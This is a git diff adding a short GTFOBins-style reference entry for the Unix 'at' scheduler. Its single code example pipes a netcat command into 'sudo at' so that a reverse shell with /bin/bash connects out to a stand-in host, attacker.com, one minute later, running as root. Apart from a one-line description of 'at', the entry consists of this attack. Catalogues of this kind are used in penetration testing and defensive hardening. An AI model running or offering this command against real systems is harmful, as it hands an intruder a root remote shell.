diff --git a/_gtfobins/at.md b/_gtfobins/at.md new file mode 100644 index 0000000..43342ed --- /dev/null +++ b/_gtfobins/at.md @@ -0,0 +1,8 @@ +--- +description: | + at is a command-line utility that allows you to schedule commands to be executed at a particular time. +functions: + sudo: + - code: | + echo "nc attacker.com 12345 -e /bin/bash" | sudo at now +1 minutes +--- \ No newline at end of file